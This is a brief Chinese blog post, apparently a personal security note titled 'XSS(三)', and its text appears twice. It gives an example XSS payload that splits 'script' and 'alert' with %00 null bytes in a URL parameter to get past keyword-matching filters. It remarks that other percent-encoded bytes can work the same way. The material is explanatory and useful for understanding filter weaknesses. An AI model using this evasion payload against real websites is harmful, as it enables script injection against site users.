今兒個遇到個xss:
栗子:xxx.com/a.action?n=123<scr%00ipt>ale%00rt(1)</scr%00ipt>
想起很早之前看過的一篇%xx-%xx都可以用來突破這類對敏感字符串匹配的過濾
XSS(三)
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
今兒個遇到個xss:
栗子:xxx.com/a.action?n=123<scr%00ipt>ale%00rt(1)</scr%00ipt>
想起很早之前看過的一篇%xx-%xx都可以用來突破這類對敏感字符串匹配的過濾